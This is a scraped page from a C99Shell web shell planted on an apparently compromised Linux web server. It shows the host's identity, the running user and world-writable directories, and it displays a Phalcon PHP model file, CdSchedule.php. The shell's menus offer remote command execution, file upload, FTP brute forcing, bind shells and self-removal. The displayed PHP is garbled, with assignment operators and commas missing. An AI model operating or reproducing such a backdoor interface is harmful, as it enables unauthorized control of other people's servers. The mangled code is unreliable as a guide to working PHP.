!C99Shell v. 2.6 Mod (06.03.2026)!

Software: Apache. PHP/7.2.34 

uname -a: Linux li456-155.members.linode.com 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01
UTC 2023 x86_64
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/TABASCO/AT_ADMIN/AT_MERCOTAB/apps/models/   drwxrwxrwx
Free 1.75 GB of 47.23 GB (3.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Bind    Proc.    FTP brute    Sec.    SQL    PHP-code    Self remove    Logout    


Viewing file:     CdSchedule.php (2.73 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Modules\Models;
class 
CdSchedule extends \Phalcon\Mvc\Model
{

    
/**
     *
     * @var integer
     * @Primary
     * @Identity
     * @Column(column="schid", type="integer", length=11, nullable=false)
     */
    
protected $schid;

    
/**
     *
     * @var string
     * @Column(column="schedule", type="string", length=45, nullable=true)
     */
    
protected $schedule;

    
/**
     *
     * @var string
     * @Column(column="date_creation", type="string", length=45, nullable=true)
     */
    
protected $date_creation;

    
/**
     * Method to set the value of field schid
     *
     * @param integer $schid
     * @return $this
     */
    
public function setSchid($schid)
    {
        
$this->schid $schid;

        return 
$this;
    }

    
/**
     * Method to set the value of field schedule
     *
     * @param string $schedule
     * @return $this
     */
    
public function setSchedule($schedule)
    {
        
$this->schedule $schedule;

        return 
$this;
    }

    
/**
     * Method to set the value of field date_creation
     *
     * @param string $date_creation
     * @return $this
     */
    
public function setDateCreation($date_creation)
    {
        
$this->date_creation $date_creation;

        return 
$this;
    }

    
/**
     * Returns the value of field schid
     *
     * @return integer
     */
    
public function getSchid()
    {
        return 
$this->schid;
    }

    
/**
     * Returns the value of field schedule
     *
     * @return string
     */
    
public function getSchedule()
    {
        return 
$this->schedule;
    }

    
/**
     * Returns the value of field date_creation
     *
     * @return string
     */
    
public function getDateCreation()
    {
        return 
$this->date_creation;
    }

    
/**
     * Initialize method for model.
     */
    
public function initialize()
    {

        
$this->setSource("at_schedule");
        
$this->hasMany('schid''CdForm''schid', ['alias' => 'CdForm']);
    }

    
/**
     * Returns table name mapped in the model.
     *
     * @return string
     */
    
public function getSource()
    {
        return 
'at_schedule';
    }

    
/**
     * Allows to query a set of records that match the specified conditions
     *
     * @param mixed $parameters
     * @return CdSchedule[]|CdSchedule|\Phalcon\Mvc\Model\ResultSetInterface
     */
    
public static function find($parameters null)
    {
        return 
parent::find($parameters);
    }

    
/**
     * Allows to query the first record that match the specified conditions
     *
     * @param mixed $parameters
     * @return CdSchedule|\Phalcon\Mvc\Model\ResultInterface
     */
    
public static function findFirst($parameters null)
    {
        return 
parent::findFirst($parameters);
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

c99shell Mod — c99shell.com © 2026
Generation time: 0.0375